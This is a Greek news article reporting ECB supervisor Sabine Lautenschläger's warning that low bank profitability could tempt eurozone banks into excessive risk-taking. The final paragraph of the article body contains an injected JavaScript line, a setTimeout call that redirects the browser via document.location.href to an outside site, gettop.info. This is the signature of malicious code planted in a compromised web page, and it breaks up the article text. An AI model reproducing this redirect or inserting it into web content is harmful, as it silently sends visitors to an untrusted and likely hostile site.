ΕΚΤ: Αξιολόγηση των μοντέλων που χρησιμοποιούν οι ευρωπαϊκές τράπεζες για τον υπολογισμό των κινδύνων τους

0
2

 

Οι τράπεζες της Ευρωζώνης είναι πιο ανθεκτικές σήμερα από ό,τι ήταν πριν από την κρίση, αλλά η χαμηλή κερδοφορία τους δημιουργεί τον κίνδυνο ανάληψης υπερβολικών κινδύνων, δήλωσε η Ζαμπίνε Λαουτενσλέγκερ, μέλος του Εκτελεστικού Συμβουλίου της Ευρωπαϊκής Κεντρικής Τράπεζας (ΕΚΤ), σε ομιλία της σε συνέδριο στη Φρανκφούρτη.

«Η βιωσιμότητα των επιχειρηματικών μοντέλων (των τραπεζών) είναι τώρα ένα από τα κύρια σημεία προσοχής. Πρέπει να προειδοποιούμε (τις τράπεζες) να μην εισέρχονται στον πειρασμό να αυξάνουν τα κέρδη τους με την ανάληψη πολύ μεγάλων κινδύνων», δήλωσε η Λαουτενσλέγκερ, που είναι και αντιπρόεδρος του μηχανισμού εποπτείας των τραπεζών.

«Η υπέρμετρη αναζήτηση αποδόσεων θα μπορούσε εύκολα να οδηγήσει σε νέα προβλήματα για τις ίδιες τις τράπεζες και το χρηματοπιστωτικό σύστημα συνολικά», σημείωσε, προσθέτοντας ότι «αυτό δεν αποτελεί μία καθαρά υποθετική ανησυχία» σε ένα πλαίσιο όπου η χαμηλή κερδοφορία συνυπάρχει με άφθονη ρευστότητα και υψηλό ανταγωνισμό. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here